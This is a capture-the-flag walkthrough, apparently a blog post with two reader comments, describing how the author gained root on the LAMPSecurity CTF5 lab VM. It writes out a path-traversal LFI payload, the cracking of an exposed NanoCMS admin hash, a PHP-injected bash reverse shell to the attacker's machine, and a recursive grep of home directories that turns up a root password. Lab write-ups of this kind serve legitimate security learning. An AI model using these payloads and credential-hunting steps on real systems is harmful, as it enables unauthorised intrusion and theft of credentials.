- VM: LAMPSecurity: CTF5
- Goal: Gain root access
- Approach: solve without automated exploitation tools
Target Discovery
nmap -sn 192.168.172.200-254

Port Scanning
nmap -p- -A 192.168.172.240

- Port 22: OpenSSH 4.7
- Port 25: SMTP
- Port 80: Apache httpd 2.2.6
- Port 110: pop3 ipop3d 2006k.101
- Port 111: RPC #100000
- Port 139: Samba smbd 3.X – 4.X (workgroup: MYGROUP)
- Port 143: University of Washington IMAP imapd 2006k.396
- Port 445: Samba 3.0.26a-6.fc8
- Port 901: Samba SWAT administration server
- Port 3306: MySQL 5.0.45
Enumeration
There’s quite a few ports open. First let’s check out the website.

I test around the site against SQL injection but didn’t find any.
Then identified LFI (local file inclusion) vulnerability against the page parameter.
http://192.168.172.240?page=../../../../etc/passwd%00

Further checking the website shows that the website is using NanoCMS for Blogging (Blog tab).

Google about NanoCMS vulnerability quickly showed /data/pagesdata.txt exposes password hash. Try on the website and returned the file with password hash.
http://192.168.172.240/~andy/data/pagesdata.txt

username: admin, password hash: 9d2f75377ac0ab991d40c91fd27e52fd
The hash has 32 hex characters so most likely MD5 hash.I use website md5decrypt.net and is able to find the password quickly: shannon
username: admin, password: shannon
Exploitation
All right. Good start. Let’s try to login at the Admin Login of Andy’s Blog page. And sure enough, login successfully to the NanoCMS Admin Panel.

I look around the Admin Panel and quickly spot something very interesting: ‘New Page‘. Looks like I can create new blog pages there. I quickly create a new blog page with simple php code to test if php code execution is allowed.

I added the Page and then click on new blog page ‘Testing‘ at Pages & Options.

Awesome. Php code execution is allowed.
Limited Shell
We can use php code execution to create a reverse shell. First start Netcat at kali box to listen to port 4444:
nc -lp 4444
Then modify the Testing blog page content to: (note: kali box ip address is 192.168.172.110)
<?php system("bash -i >& /dev/tcp/192.168.172.110/4444 0>&1"); ?>
Now refresh the Testing blog page again and observe the kali box:

That’s great. We got a shell access as user apache
Privilege Escalation
With shell access, we search around the system looking for useful information to gain root access. That include sudo usage, setuid commands, configuration files & users’ files.
Luckily, we come across the root password while searching for password recursively in /home directory using the following search command:
grep -R -i password /home/* 2> /dev/null

Looks like the .note file in patrick’s folder may have root password.
cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note

Root password: 50$cent
Let’s try it out

Bingo! Root access.
Thank you Author madirish2600 for the box LAMPSecurity: CTF5
richa
29 Apr 2020grep -R -i password /home/* 2> /dev/null
can you please explain this command
Alan Chan
21 May 2020It searches for files in folder /home recursively that contains the text ‘password’.
-R: recursively
-i: case insensitive
2> /dev/null: do not display errors (e.g. permission denied)